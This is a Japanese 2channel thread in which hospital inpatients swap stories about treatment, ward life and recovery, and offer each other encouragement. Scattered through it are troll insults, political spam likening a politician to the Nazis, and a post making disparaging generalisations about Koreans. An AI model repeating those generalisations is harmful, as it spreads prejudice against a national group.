2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

入院してる者同士まったりと駄弁るスレ4

1 :名無しさん@お大事に:2008/08/19(火) 07:40:32 ID:NNBHjnko
コテハン・名無し共にまったり駄弁るスレです\(^o^)/
初めての方は、書き込む前に読んでください。

■コテハン・名無し共にマッタリ駄弁るスレです、コテの方が馴染みやすい傾向にあります。
■荒らしは徹底的にスルーです、空気と考えて下さい。
■sage進行でお願いします。
■発言内容に関しては、特に制限はありません。
病気に負けない気持ち。
愚痴を書いてのうっぷん晴らし。
茄子(ナース)・主治医に対しての愚痴。
部屋で起きたハプニング等々。
ただ限度を越えた、対個人・団体への誹謗・中傷は禁止します、節度と良識に乗っ取った発言を心掛けましょう。

■病気に関しての質問も可能、同じ経験がある人がいれば答えてくれます。
最終的には主治医・ソーシャルワーカーに相談することを忘れずに。

■自分の命を絶つ・絶ちたい等のニュアンスの発言は極力控えて下さい。
辛いのはわかりますが、病気を治したいと思っている人が大多数です。
ただ病気に負けそうな時は、皆に相談してみましょう、きっと力になってくれるはずです。

■新しくスレに来た人は温かく迎えましょう、スルー禁止。
■必要以上に相手に対して病気のことを聞くのは控えて下さい、中には言いたくない人もいます。
相手が話せるのを、ゆっくり待ってあげましょう。
■入院板ですが、一度このスレに居住した場合、退院後も書き込み可能です。
退院するから姿をくらますのはやめましょう、逆に皆が不安になります。
■あまり夜更かしせずに、きちんと睡眠を取りましょう。

前スレ
入院してる者同士まったりと駄弁るスレ3
http://life9.2ch.net/test/read.cgi/inpatient/1205315369/

2 :名無しさん@お大事に:2008/08/19(火) 08:06:54 ID:XMlcZ5QV
1乙。

3 :名無しさん@お大事に:2008/08/19(火) 10:13:35 ID:CGb2WNsi
>>1
たまゆら乙

4 :テレビカード:2008/08/19(火) 11:34:04 ID:7jsCHT2W
腸閉塞で昨日から入院中。絶食キツいっす…

5 :名無しさん@お大事に:2008/08/19(火) 13:47:11 ID:UL3Kw9Ht
>>4 テレビカード
腸閉塞はキツイって聞くな( ゚Д゚)
治療ってどんなの?
頑張れよ!!

6 :名無しさん@お大事に:2008/08/19(火) 15:04:32 ID:rajK9jWG
>>4
絶食……。
応援します!
応援します!
応援します!
負けるな!
負けるな!
負けるな!


以上!

7 :名無しさん@お大事に:2008/08/19(火) 15:08:43 ID:rajK9jWG
>>4
絶食……。
応援します!
応援します!
応援します!
負けるな!
負けるな!
負けるな!


以上!

8 :テレビカード:2008/08/19(火) 17:58:04 ID:7jsCHT2W
>>5 ありがとう
治療方法はとりあえず絶食で様子を見るみたいです。状態が変わらない場合は開腹手術もありえるとか…

つかそろそろ晩飯タイムで回りがざわつき始めてます
散歩でも行くかな(泣)

>>6 ありがとう
なんとか耐え抜きます

9 :名無しさん@お大事に:2008/08/19(火) 18:02:40 ID:FkA06skS
あ、スレが立ってる!
>>1乙です!
10月になったらまた来ますノシ

10 :名無しさん@お大事に:2008/08/19(火) 21:43:56 ID:NNBHjnko
>>8 テレカ
辛いだろうけど、耐えしのぐんだ(´Д⊂!!!
食べ物来る時間あたりに少し散歩して、1時間位すれば
匂い消えないかな?!
こっちは空気清浄機が大活躍して匂いすぐ消えるけど
今の季節空調あるから少しの間部屋から出るのも手だ!

11 :名無しさん@お大事に:2008/08/19(火) 22:17:58 ID:GlMgxoXJ
生きる屍リビングザデッド

12 :名無しさん@お大事に:2008/08/19(火) 23:20:33 ID:I4bbo/LY
埋め

13 :名無しさん@お大事に:2008/08/20(水) 00:55:50 ID:cTq8ShAY
>>4

わたしも、今日(明けたから、昨日だけど)から入院です。
わたしは腸炎で、しばらく絶食です。
空腹も痛みも辛いですね(´・ω・`)


みなさん、それぞれにしんどいでしょうが、早く良くなる事を祈りつつ、入院生活を乗り切りましょう。

14 :テレビカード:2008/08/20(水) 09:04:19 ID:tGAjdY4E
>>13 そうですかお互い大変ですね。僕は経過が順調のようで飲み物は解禁されました。早く回復するといいですね☆今ベッドのシーツ交換で待ちぼうけくらってます。早く終わらんかな

15 :名無しさん@お大事に:2008/08/20(水) 10:58:23 ID:i0MohLmd
【ビーチバレー】水着姿で応援している上村愛子さんを観客席で発見【jpg有】

http://society6.2ch.net/test/read.cgi/river/1206282306/

16 :名無しさん@お大事に:2008/08/20(水) 12:03:50 ID:sxcucfJo
うめ

17 :13:2008/08/20(水) 17:00:33 ID:cTq8ShAY
>>テレビカードさん

経過順調とのことでなによりです。
早く何か食べれるまでになるといいですね。

わたしも水分だけはOKですが、水とお茶のみだから、
もう少し、飲み応えのあるものが欲しいですわ(^-^;

シーツ交換は退屈な時間ですよね。。
でも、綺麗なシーツは気持ちいいですよね♪

18 :(´д`):2008/08/20(水) 21:21:25 ID:iwy+lhF7
(´д`) ソフトボール早く決着つけろよ…

19 :名無しさん@お大事に:2008/08/20(水) 21:32:59 ID:sxcucfJo
埋め

20 :名無しさん@お大事に:2008/08/21(木) 09:02:32 ID:R0ZJXc25
もう限界!!同室のババァがウザすぎる!!!!食事が食べきれないと、自分のパン渡してくるし
「食べられないから食べて」じゃなくて「二枚くらいアンタ、食べなさいよ」って言ってくるから腹立つ。しかも、
※「これ薄焼きだからピーナッツバター塗って、挟んで食べなさい」
とか食べ方まで押し付けてくるし

<解説>
薄焼き=薄く切ってある食パンのこと
ピーナッツバター=本当はただのピーナッツクリームです。

「私は千切ってから付けて食べてるんですよ」って言ったら
※くりかえし


お見舞いで果物もらったときは
「アンタ、果物なんて高くて普段買えないでしょ。全部一人で食べなさい」
「ぶどうは早く食べなさいよぉ〜」
「ぶどうとみかんは冷凍しなさい。ものすごく美味しいから」
「ぶどうは一粒ずつ取って、洗ってから袋に入れて冷凍しなさい」
とか言ってきて、薬が入っていたような小さいジッパーパック無理矢理渡して来た。
こんな小さい袋に巨峰が全部入るわけないし!!

夜には「千の風になって」を歌い出す始末・・・
ボソボソ歌うから気味が悪い。お前が千の風になっちまえ!!!!

21 :名無しさん@お大事に:2008/08/21(木) 11:28:12 ID:z2EcWLQx
俺がシャワー予約した時間なのに俺の前のジジイいつまで浴びてやがんだ(゜ロ゜#)
俺の時間11時から30分なのにお構いなしでずっと浴びてる・・・

22 :名無しさん@お大事に:2008/08/21(木) 20:38:30 ID:dZX3fJq1
看護婦にちくれよヒッキー患者

23 :名無しさん@お大事に:2008/08/21(木) 23:27:32 ID:33ggDmN2
埋め

24 :名無しさん@お大事に:2008/08/22(金) 06:47:12 ID:5rLIxMq8
今、入院して三週間目なんだけど昨日、ふと気になった。
病院の個室、大部屋って監視カメラって付いてるの?
ICUには付いてるのは見たけど大部屋は見る限りなさそうな感じだし…皆さんのとこはどうですか?

25 :名無しさん@お大事に:2008/08/22(金) 15:21:32 ID:0AcCpv/P
>>24
無いと信じている

26 :名無しさん@お大事に:2008/08/22(金) 20:41:06 ID:9YB+SZ/r
うめ

27 :名無しさん@お大事に:2008/08/22(金) 22:07:47 ID:9YB+SZ/r


28 :名無しさん@お大事に:2008/08/22(金) 23:25:32 ID:9YB+SZ/r


29 :名無しさん@お大事に:2008/08/22(金) 23:31:07 ID:564uw5l6
荒らしは運営に通報します
悪禁になったら暫くかきこめないのであしからず

30 :名無しさん@お大事に:2008/08/23(土) 17:44:06 ID:SmYwaSQb
>>24
当方入院5週目ですが、2人部屋→4人部屋→6人部屋(途中で転科)
を見てきました。茄子駅にベッドが映っているモニターがあって廊下か
ら見えちゃうのですが、常時監視は個室の重症者のみみたいです。
(某都立病院)

31 :名無しさん@お大事に:2008/08/23(土) 22:09:39 ID:lCC6HejU
ああああああああああああああああああああああああああああああああああああああああああああああ

32 :名無しさん@お大事に:2008/08/23(土) 22:23:10 ID:S22JcRkn
どしたの?
(^。^;)

33 :名無しさん@お大事に:2008/08/24(日) 08:42:30 ID:KUp+l+lo
24です。>30さん、ありがとです^^
着替えの時とか気になってたんです…私は少しの間ICUにいましたが(重症って程ではないけど)カメラがすごく気になって着替えもカメラに背を向けてしてました。
作動してたとしたらいろんな意味で恥ずかしい…。

34 :名無しさん@お大事に:2008/08/24(日) 23:25:17 ID:5ywBmTOW
あほか

35 :名無しさん@お大事に:2008/08/25(月) 10:27:28 ID:OAkEwYC7
真剣に相談です。26歳女マスコミ勤務です。
最近転職した会社の激務で、胃腸炎になりました。
明日退院予定なんだけど、一週間連続徹夜で泊まり当たり前な仕事に戻るぐらいならお金払ってここに入院していたい。
主治医が回診に来た際、『もっといたい』って言っちゃダメですか?

36 :名無しさん@お大事に:2008/08/25(月) 15:25:18 ID:PukiIr1Z
>>35

ご自身がまだ、入院しての療養が必要だと感じるなら、主治医に相談してみるのは、ありだと思いますよ。
仕事や、病院側の都合はいろいろとあるでしょうが、
35さんの心身ともの健康のために、一番良い選択ができるといいですね。

お大事になさってください。

37 :名無しさん@お大事に:2008/08/26(火) 09:38:31 ID:qC7tGCk8
胃腸炎が治ったから退院して、再発したら本末転倒でしょ。

メンタルな部分も含めて主治医に相談してください。

どのくらいの入院かわかりませんが、お大事に。

38 :名無しさん@お大事に:2008/08/26(火) 16:27:55 ID:tXPk9hFu
過労とストレスで吐血して先週から入院生活です
体調だけならもう退院出来るそうなんだけど、精神的に参ってます。
不眠症な事もあって昨日から安定剤と眠剤を病院から出してもらって服用してます。
正直退院するのが自分でも怖いです

主治医に相談したらしばらく様子見ましょうと行ってくれたんだけどやっぱり近いうちに退院になっちゃうのかなぁ…

39 :名無しさん@お大事に:2008/08/26(火) 21:33:38 ID:MZIPmiW6
知らねえよ

40 :名無しさん@お大事に:2008/08/26(火) 22:21:35 ID:5EaMT7yU
>>38
統合失調症になる前に医師に相談を

41 :名無しさん@お大事に:2008/08/26(火) 23:31:27 ID:MZIPmiW6
アボーン

42 :名無しさん@お大事に:2008/08/27(水) 03:57:28 ID:HKESFF/E
>>38

かかる病院がちがくね?

43 :名無しさん@お大事に:2008/08/27(水) 04:02:44 ID:6WlYkcZg
五月蝿すぎて寝れん
もう手術やめて明日帰ろ

44 :名無しさん@お大事に:2008/08/27(水) 07:01:19 ID:6gcdXnLR
>>43
子守歌を聞かせてあげよう。

45 :名無しさん@お大事に:2008/08/27(水) 10:14:45 ID:DzMVKFcN
公立病院は3ヶ月したら退院しないといかんのだと、
一年半近く病棟にいるおばあちゃんに聞いた。
まあ、仮退院して、再入院というのはアリらしいが。
CVで高カロリー輸液は自宅じゃ無理だよなぁ。
漏れ的には体が動かせるうちに身辺整理をやり終えたいです。。。


46 :名無しさん@お大事に:2008/08/27(水) 12:52:26 ID:aXh3kFwA
>>38
そんな会社辞めちまえよ。
激務過ぎて次々と退職者が出ているところへ入社しちゃったんだろう。
金よりも健康がどれだけ大切かはここの住民が一番知っている

47 :名無しさん@お大事に:2008/08/27(水) 20:23:57 ID:Zkn0rQXr
ひさびさに外出許可をもらって電車に乗ったのだが、
斜め向かいに座っている兄ちゃんの姿を見て以下のように連想。

頭にタオル→脱毛が激しいのでナイトキャップしたまま外出
耳にカナル型ヘッドフォン→CVの管に見える
首に提げたiPOD→心拍モニタに見える

いや〜かなり病院環境に染まってきてめげました。

48 :チューブ:2008/08/27(水) 20:47:23 ID:tBRfuDQE
一昨日から救急車で運ばれて入院生活スタート!
おいらも絶食中。水とかお茶なら飲めるけどね。腸を空っぽにして腸壁を自然治癒で直すんだそうだ。
しっかし何が辛いってタバコが一番辛い。
吸いたいのにわざわざ点滴のガラガラ引いて外出ないと吸えないんだもん…

呑む打つ買うもしないで唯一タバコが好きなのに…そんなんで禁煙二日目。
ガム噛みまくり。


49 :名無しさん@お大事に:2008/08/28(木) 09:46:54 ID:USWeOWCa
外の散歩ルートのとなりに喫煙所があって、
点滴を繋いだまま喫煙している人を見かけるけど、
点滴とたばこの煙がとっても不釣り合いw 
この際だから断煙したら?肺がんになるリスクが
多少は減るよ。

50 :名無しさん@お大事に:2008/08/28(木) 15:38:23 ID:A4kt0FCi
今日から人生初入院、明日人生初手術です。
暇潰し道具をワンセグとラジオくらいしか持ってこなくて大後悔。
あと動けないから激しく太りそうな悪寒。

51 :名無しさん@お大事に:2008/08/28(木) 19:17:05 ID:bs7SxfS4
大丈夫。病院食は1800kcalくらいしかないのと、
体を動かさないことで筋肉が急速に
落ちるので激しくやせる。

52 :チューブ:2008/08/28(木) 21:22:17 ID:Y7tlwnW6
太った時は我慢して食べる量なり減らして、効果が目に見えるから痩せてきたなぁとかさ。
タバコは辞めても効果が目に見えないんだ。だから辞めた張り合いが無いのさ。って書き込みしてて気がついたよ。吸ったつもり貯金でもしようかねぇ。
一箱500円になったら結構なもんだし、肺癌かぁ… ありがとう≫49

53 :名無しさん@お大事に:2008/08/28(木) 23:30:18 ID:c4LJTYK2


54 :名無しさん@お大事に:2008/08/29(金) 02:33:45 ID:JUmg2YRl
尿道初めてやったけどこれのせいで寝れない… 
つらい!

55 :名無しさん@お大事に:2008/08/29(金) 07:01:29 ID:JUmg2YRl
ちょっと寝れた 
これ自分で抜けるかなあ 
無理だよ

56 :名無しさん@お大事に:2008/08/29(金) 07:58:47 ID:JUmg2YRl
自分で抜かないらしい 
看護婦によって言う事違う

57 :名無しさん@お大事に:2008/08/29(金) 08:48:34 ID:JUmg2YRl
抜いてもらった。 
全然するっといって良かったあ。 
ほんっとに良かった。

58 :名無しさん@お大事に:2008/08/29(金) 09:02:16 ID:mwCN15yW
何がヤバイって元気になってくると風呂に入りたくなる。
さらに元気になってくると性欲が出てくる。
看護婦さん、制服着てると2割増可愛さアップで参っちゃうよ。

個室での話なんだけど、前高校生の時入院してた時トイレに鍵かけて便座に座りながらオナニーしてて、
終わって立ち上がろうとしたら久しぶりの気持ち良さにヨロケテしまってさ。
近くにある緊急呼び出しボタンについ手をついちゃったんだ。
「○○さん!どうしました!?大丈夫ですか!?」いつもよりも声が真剣だ!?
俺「いぇ…何でもないんですけど…」
看「何でもないで普通そこのボタン押さないでしょ!?本当の事をいいなさい!」
俺「あの…よろけて…おしちゃっただけなんです…」
看「本当に?」
俺「はい…」
チョ〜きまずかった。

59 :名無しさん@お大事に:2008/08/29(金) 11:00:58 ID:tHcq1AnD
みんな、毎日どんなことして過ごしてるの?
すごい雨と雷ですね。

60 :名無しさん@お大事に:2008/08/29(金) 13:05:12 ID:UgoWD2+Y
@売店に買い物
A病院内の散歩
B病気のことの調べ物(がんだといくら調べても追いつかない)
C本読み(病院でやってない治療方法の紹介本とか)。
D薬のせいでグロッキー。
E同じ病棟のじいさま、ばあさまと談話。
F家族に定時連絡。
Gときどき外出許可をもらってアパートのカビ対策。
H身辺整理をどうするかを考える。
I10日にいっぺんくらい会社の同僚とメール交換(戦況報告)

ここ2ヶ月くらい上記の繰り返し。

61 :名無しさん@お大事に:2008/08/29(金) 13:56:05 ID:sZN+vc6n
ワンセグとDVDつきのポータブル液晶で視聴三昧
安価な名作映画相当見たな

62 :名無しさん@お大事に:2008/08/29(金) 14:23:04 ID:OUjWOXc+
DVDを再圧縮したファイルをHDDに一杯つめて持ち込んだのだが、
なんだか見る元気がでない。病気のことの不安感で一杯なので、
まったり気分になれない orz

63 :名無しさん@お大事に:2008/08/29(金) 15:10:36 ID:tHcq1AnD
レスありがとうございます。
読書やDVD鑑賞はいいですね。

せっかくだから、普段できないことをやりたいなって思うけど、
結局、一日中テレビかけながらうとうとしとるだけだ…。
有意義に過ごしたいんだけどな。

64 :名無しさん@お大事に:2008/08/29(金) 18:24:01 ID:JUmg2YRl
入院中はそれどころじゃないよな
俺もテレビ見てうとうとしてる 
家だとあまり見ないんだけど

65 :名無しさん@お大事に:2008/08/29(金) 20:23:57 ID:sZN+vc6n
目玉にガス入れたがらしばらく俯き、俯せ生活
ポータブルは液晶画面平行に動かせるから便利でした
片目でキツいけどね

66 :名無しさん@お大事に:2008/08/29(金) 20:26:08 ID:QqZFjNWq
硝子体の摘出でもしたの?

67 :名無しさん@お大事に:2008/08/31(日) 10:19:26 ID:z2sPxPxe
日曜日って、静かだね。
昨日は、退院が多かったみたいで、さらに静かになった。
ビッグマック食べたいなー

68 :名無しさん@お大事に:2008/08/31(日) 21:03:58 ID:NZvSojMj
交通事故で寝たきり
今日はオムツ交換中に見舞い客が二度も。
看護婦さんが使用後のオムツを持ち去るので切ない。

69 :名無しさん@お大事に:2008/09/06(土) 11:01:38 ID:FxXspmWq
土日はスタッフも少ないし患者も帰る人多いしなぁ
寂しいなぁー(つд`)

70 :名無しさん@お大事に:2008/09/06(土) 13:19:36 ID:LZett2lG


71 :名無しさん@お大事に:2008/09/06(土) 21:31:24 ID:tMNK2vTc
来週退院予定(以降毎日通院で治療継続)なもんで
いろいろたまった荷物を持ち帰るため外出したが、
体力落ちまくりで、背中は痛いは腰は痛いはで、
来週からほんとに通院できるのか不安だ。

72 :名無しさん@お大事に:2008/09/14(日) 15:01:36 ID:pkqYflN/
>>68
前入院してたとき、床上排泄中に義父義母旦那が
お見舞いに来て焦ったw
汚物と入れ違いにお見舞いが来る切なさと言ったら・・・(∵`)

73 :名無しさん@お大事に:2008/10/01(水) 15:08:10 ID:GFAOpzio
ねこちゃんや他のコテの方々は元気でいるかな?
自分も三週間の入院生活してて、週末退院予定。
入院中の人も、退院して療養中の人もみんな元気になりますように。

74 :名無しさん@お大事に:2008/10/01(水) 17:02:06 ID:pV3TRSLV
みんながんばって治してください 応援してます

75 :名無しさん@お大事に:2008/10/01(水) 17:27:00 ID:wXPpm+Ye


76 :のっぺら ◆8cYjewnkos :2008/10/02(木) 13:00:26 ID:G4U7NvzZ
昨日から五回目の入院始まったよ〜
今日から毒入れ!

77 :名無しさん@お大事に:2008/10/02(木) 22:12:47 ID:8Pvg6KEh
眠たいけど便秘気味なので下剤飲まされた
腹は痛いけど中身が出てこない
眠れな〜い

78 :名無しさん@お大事に:2008/10/02(木) 23:10:59 ID:bOH081X7
知らねえよ

79 :名無しさん@お大事に:2008/10/03(金) 15:53:34 ID:eRZDQjrw
おぉ!のっぺらさんだ。

80 :のっぺら ◆8cYjewnkos :2008/10/06(月) 16:22:28 ID:GVMtQ7we
二回吐いたししんどい…
抗がん剤もういや

81 :名無しさん@お大事に:2008/10/06(月) 21:45:46 ID:iEbeD14H
已めれば

82 :名無しさん@お大事に:2008/10/07(火) 09:06:11 ID:1ZLLIzOM
>>80
乙。ほんとにおつです。


83 :名無しさん@お大事に:2008/10/07(火) 22:58:10 ID:69/4ib2o
>>80
オラ、3回吐いた

84 :名無しさん@お大事に:2008/10/07(火) 23:26:23 ID:GGgnZT0k
WWWWWWWWWWWWW

85 :名無しさん@お大事に:2008/10/08(水) 12:57:56 ID:nsPeewZf
抗がん剤嫌だね。俺も辛かったわ。
>>80さんがんばって。

86 :名無しさん@お大事に:2008/10/08(水) 13:44:13 ID:judCBMn3
だから(ry

87 :のっぺら ◆8cYjewnkos :2008/10/08(水) 19:55:54 ID:djVZ3fT9
励ましの言葉や、三回吐いちゃった方、みんなありがとう
やっとごはんが食べられるようになったよ
みんなも早く良くなってねノシ
週末には退院したいなぁ

88 :名無しさん@お大事に:2008/10/08(水) 23:28:21 ID:judCBMn3
退院すればW

89 :名無しさん@お大事に:2008/10/09(木) 16:20:04 ID:Dn+EFJ3x
>>80
血液検査でCRPが上昇していて再入院。来週から化学療法
になりそうです。おたがいがんばろう。

90 :のっぺら ◆8cYjewnkos :2008/10/09(木) 19:25:03 ID:J9tuJ5f/
>>89
頑張ってくださいね
一緒に乗り越えましょう!

91 :名無しさん@お大事に:2008/10/09(木) 21:08:08 ID:+1k1qmiT


92 :のっぺら ◆8cYjewnkos :2008/10/11(土) 07:39:43 ID:Kd5G7Kzn
今日退院します
みなさんも早く退院できるといいですね。
また一月にお世話になります
それまでROMに戻りますね

それではノシ

93 :89:2008/10/11(土) 10:40:15 ID:XgGWkDLQ
>>92
3ヶ月後ということは90日後ですね、お元気で!
自分は45日でスタートラインに戻ってしまいマスタ。
気を取り直してやり直します。

94 :ドアマン:2008/10/27(月) 18:57:38 ID:FIQ2hp7Y
今日から再入院
看護師さんも顔見知りで勝手知ったる我が家な自分はどうかと思った
でもまぁ顔見知りがいると安心しますねぇ

95 :名無しさん@お大事に:2008/10/27(月) 21:49:38 ID:doLvlkwy
あほか

96 :ねこ野郎 ◆xgSWdejH02 :2008/11/17(月) 01:16:42 ID:v/0ZDrDs
みなさんお元気ですか?
スレを検索したら落ちて無かったので嬉しいです。^^
これから冬の到来ですね・・・orz
皆さん 風邪には気を付けてくださいね!
また覗きに来ます ノシ

97 :名無しさん@お大事に:2008/11/17(月) 21:20:24 ID:V2+DjFBH
このブタ野郎!

98 :のっぺら ◆8cYjewnkos :2008/11/18(火) 23:57:54 ID:FwP4O9go
ねこさんキター!
体調はどうですか?
元気そうで何よりです
まわりは風邪引きばっかりで大変です…(´д`)

99 :ねこ野郎 ◆xgSWdejH02 :2008/11/19(水) 00:01:36 ID:yzgiN2Jy
>>98
お元気ですか?いやーうれしいです!!!
私はとても元気です!明日死ぬかもなんて言われた人間なのに
案外人間って強いなーって最近しみじみ・・・。
今日インフル受けてきました。上手な看護婦さんだったので
痛く無かったです〜^^ 
マスクは外せない季節になりましたね。
持病のほうはなんとか寛解保ってますが、精神科に通うかもっていう
オチです\(^o^)/オワタ

100 :名無しさん@お大事に:2008/11/19(水) 17:44:44 ID:nNrsXt4W
あほか

101 : 【小吉】 【625円】 :2009/01/01(木) 23:44:31 ID:FhvDQ929
どうだ!

102 :ずっころ ◆/VJxsUn3ao :2009/01/12(月) 23:00:37 ID:NfVSEREE
まだ残っていたのですね、このスレ( ・ω・)

そろそろこのスレに初カキコして1年になります。
ねこちゃんが元気にしているようで何より。
ドアマンさんあんぱんさんお茶さんY氏等々懐かしい。元気してるかなぁ。
たまゆらさんもそろそろ一周忌か。。

退院後に付き合うことになったお気に茄子、
来年結婚するかもです(*・ω・)
当時のことを知ってる人で、見てる人いたらご報告まで。


ということで、板違いスマソ。
入院されてる方は、お大事になさってください。

103 :のっぺら ◆8cYjewnkos :2009/01/13(火) 15:09:39 ID:9u/mY32K
ずっころさんお久しぶりです!
あの茄子たんとけけけけっこん!!
おめでとうございます!
何だかうれしいな〜♪
今年に入ってから暗い話ばっかりだったからちょっと光が見えたよ
そういえば、たまゆらさん一周忌か…
一年前はスレが賑わってたよね
今はみんな退院して嬉しいやら寂しいやら
私は二月中から入院です
長かった化学療法もやっと終わりますノシ

104 :名無しさん@お大事に:2009/01/19(月) 17:45:45 ID:7rL8SVaw
屎スレ終了

105 :名無しさん@お大事に:2009/01/20(火) 17:14:16 ID:RE86tX1l
ここ久しぶりだな
入院中見てたわ^^
今は退院して塾講師に戻ったぜ


ずっころサンおめ!
ナース…(*´ω`*)
羨ましいぞww
幸せにな

他の人も元気そうで何よりだ
俺も仕事頑張るぜ

106 :葡萄男:2009/01/22(木) 20:28:22 ID:KnP6v1Px
お久しぶりです。
90%程度回復し日常生活に戻ってます。

>>のっぺら
 退院オメ

>>ねこ
 まぁ気楽にな

>>ずっころ
 茄子はいいなぁ・・・茄子は・・・失敗してさw

まぁみんな頑張れ

107 :名無しさん@お大事に:2009/01/25(日) 19:29:34 ID:OF9lMD45
ガンガレッ!

108 :ねこ野郎 ◆xgSWdejH02 :2009/02/06(金) 02:00:03 ID:gTWVUayp
>>102
ずっころーーー!
今まだあるかな・・・って検索してこのスレがあることが嬉しくて泣いた。
そして順調に交際が続いているようでなにより!結婚かもなんて・・・
ホント嬉しいよ!!!おめでとう!!!あ〜 ホントに嬉しい。
これからも体に気を付けて、彼女と幸せにね!!!
あー 泣けるよ・・・。。゜゜(´O`)°゜。

私もたまゆらのメールを見返してもう一年なんだなぁって思ってた。
家族には勿論感謝感謝だけど、正直このスレと入院板が私の支えだった。
多分ここなかったらマジで\(^o^)/オワタだったよ。
ホントにありがとう、もし見ている人がいたならお礼を言いたい。ホントに会って
お礼を言いたい位です。ありがとう!

>>のっぺらー!
うんうん、去年このスレのおかげで苦しいことも笑いに変ったりと支えだったよ。
たまゆらが病院抜け出したり、子供が出来たなんて報告あったりね・・・
ホント激動だった。
長かったね、頑張ったね!のっぺら〜(´;ω;`)
化学治療お疲れ様!私はホルモン治療やらはたまた別の科にお世話になったり・・・。
ホント波乱万丈です。

>>葡萄男
皆のレスを当時を振り返るように思いだしているよ。ホントあなた方のおかげで
私はここまでこれたって言ってもいいくらい、本当に投げやりなレスした時も
支えてくれたのはいつもここの住人でした。
日常生活に戻って回復しているようでホント自分のことのように嬉しい!!!!
皆ホント風邪や感染に気を付けてね。

あー 涙がとまらん。
メールをくれた人も居たけど、necoyarou@Gメールへ。
本当に一人一人にお礼が言いたいくらい感謝しています。
それではまた! ネコ

109 :名無しさん@お大事に:2009/02/07(土) 18:20:44 ID:KujQcB0+
うわー。
叔父が緊急入院したので準備のためにひさびさに覗いたら懐かしい皆様が!
ご無沙汰しています、魚肉ソーセージです。
こちらでは早咲きの桜が見頃です。
ドセ+TS-1からTS-1単剤治療になり早半年、ザビエルヘアーもベリーショートになりました。私もここのおかげで暗くなりがちな入院生活を楽しく過ごすことができました。
本当にありがとうございました。
今でもたまゆらさんのことは時々思い出します。
もう1年経つんですね…。
早いなぁ。




110 :名無しさん@お大事に:2009/02/10(火) 23:35:46 ID:pV/9aE8g
つまらん

111 :名無しさん@お大事に:2009/02/11(水) 14:52:28 ID:9hlmt47J
うぃーす
久しぶりに来たら見たことがあるコテでいっぱいだなww
俺はコテなしだったが当時ちょくちょくレスしてたぜ
交通事故で入院してたが今は元通りだ

みんながんばれよー

112 :名無しさん@お大事に:2009/03/11(水) 00:33:15 ID:R4dWTOYS
保守

113 :名無しさん@お大事に:2009/03/11(水) 11:15:29 ID:4j+KVMbY
同室の患者さん達が話してたんだけど、意味わかんないことがある。彼女達は外来とか売店をパジャマ姿でうろつくと優越感わくんだって。
うちは大学病院なんだけど2階外来のロビー待合室?から下の会計待合ロビーが吹き抜けになっててるんだけど見下ろすのが快感なんだって。
私は逆に外来の患者さんを羨ましく感じるし、パジャマ姿も見られたくないから院内のスタバやセブン行く時もルームウェアに着替える
いろんな考え方があるんだなあと思いました〜


114 :医学部の学生:2009/03/11(水) 14:22:58 ID:P0sxseRY
まさかの自分の大学病院に入院中です。
他に僕みたいな人、いますか?

入院中に看護師さんが好きになってしまった…。
国家試験の問題集で、
「実習中に患者から連絡先を教えて欲しいと言われた場合の対応は?」
の答えが「指導医に報告する」だったんだけど。
まさか自分が患者側になるとは思いもしませんでした。

115 :名無しさん@お大事に:2009/03/12(木) 08:45:26 ID:IUxu6HPr
去年入院してた時ぶりに来ましたー
まさかこんなに過疎ってるとは。

116 :名無しさん@お大事に:2009/03/12(木) 09:07:56 ID:l7aT3R0g
【マスコミ】 「秘書起訴で小沢氏が民主党代表辞めたら、日本の民主主義おしまい」「一般ピープルも議員も冷静に」…週刊朝日編集長★5
http://mamono.2ch.net/test/read.cgi/newsplus/1236775545/l50

873 :名無しさん@九周年:2009/03/12(木) 06:51:12 ID:dUxYtIFF0
今まで検察が捜査対象にした汚職政治家を、マスコミがここまで擁護したことが
あったか?国策捜査なんてキチガイ沙汰のセリフを、あたかも当然の反論の様に
伝えるマスコミ。小沢の裏の影響力が如何に大きかったかということだよ。
こいつを総理にするという事は、恐ろしい結果を招くと思う。マスコミ、
政治家、評論家、誰も小沢のやることに口出せなくなると思う。検察にも
マスコミだけじゃなく様々なところから圧力がかかっているだろう。
検察頑張れ。ここで負けたら日本は終わりだ。

878 :名無しさん@九周年:2009/03/12(木) 06:55:17 ID:li2kf7WBO
野党時代のナチズムがこんな感じだったんだろ。マスコミと手を組んだヒトラーが政権交代にひた走る様子が。

884 :名無しさん@九周年:2009/03/12(木) 07:00:41 ID:dUxYtIFF0
>>878
うん、何か小沢とマスコミの関係見てると、ナチスの台頭期のようだ。
ここで、小沢が乗り切ったら、もう小沢に口出しできる奴はいなくなる。
三権分立の筈が、小沢が全てを掌握することになるからな。それに
第4の権力と言われるマスコミまでも小沢に従順だ。まさにナチス。

88 :名無しさん@九周年:2009/03/12(木) 07:08:17 ID:li2kf7WBO
>>884
ナチスだって始めから与党だったわけじゃないしな。政権を取る前夜のヒトラーは、何をやってもマスコミが礼賛と擁護の嵐だったわけで。

117 :名無しさん@お大事に:2009/03/12(木) 11:39:15 ID:qmnpYKO+
新入りです★
宜しくお願いします。
自分、長期入院確定なのですが、皆さん何はして1日過ごしますか?
ちなみに私は部屋から出れません。と、言うか絶対安静です

118 :名無しさん@お大事に:2009/05/03(日) 12:13:23 ID:mziIdz5R
保守

119 :名無しさん@お大事に:2009/05/13(水) 23:07:45 ID:usVJz9M/
Fuck Jap【韓国ヒットチャートNO1!!!】
http://www.youtube.com/watch?v=eQck6z4q3_A
韓国で一時期ヒットチャートNO1になった歌です。
日本にはこの情報の事は隠蔽されています。
韓国の捏造された歴史と反日教育の賜物ですね。
戦争で日本が負けた途端に裏切った国はする事が違います。

120 :名無しさん@お大事に:2009/05/13(水) 23:13:51 ID:YgyBdyCG
         「民主党の真実」
〜政治献金パーティー収入内訳から見た民主党の支持母体〜
http://ime.nu/www.youtube.com/watch?v=7nGJdY5MIwg&feature=related

121 :名無しさん@お大事に:2009/05/22(金) 22:49:31 ID:dkh6oFG9
みなさん、お久しぶりです。ずっころりん…おめでとう(^-^*)結婚 決まったのかな?
ねこちん…皆さん、元気にしてる?

ここに来た、みんなが早く元気になりますように…


122 :ずっころ ◆/VJxsUn3ao :2009/06/27(土) 19:37:38 ID:dt05fOiD
みんな元気してますかね( ・ω・)

今日婚約指輪を購入しました。
結婚までのカウントダウンスタートナリ。


ここを覗いた皆さん、元気になってくださいね。

123 :ねこ野郎 ◆xgSWdejH02 :2009/07/03(金) 13:51:34 ID:eTuuufD4
お久しぶりです!!!
皆さん元気ですか?ふと思い出しやってきました。
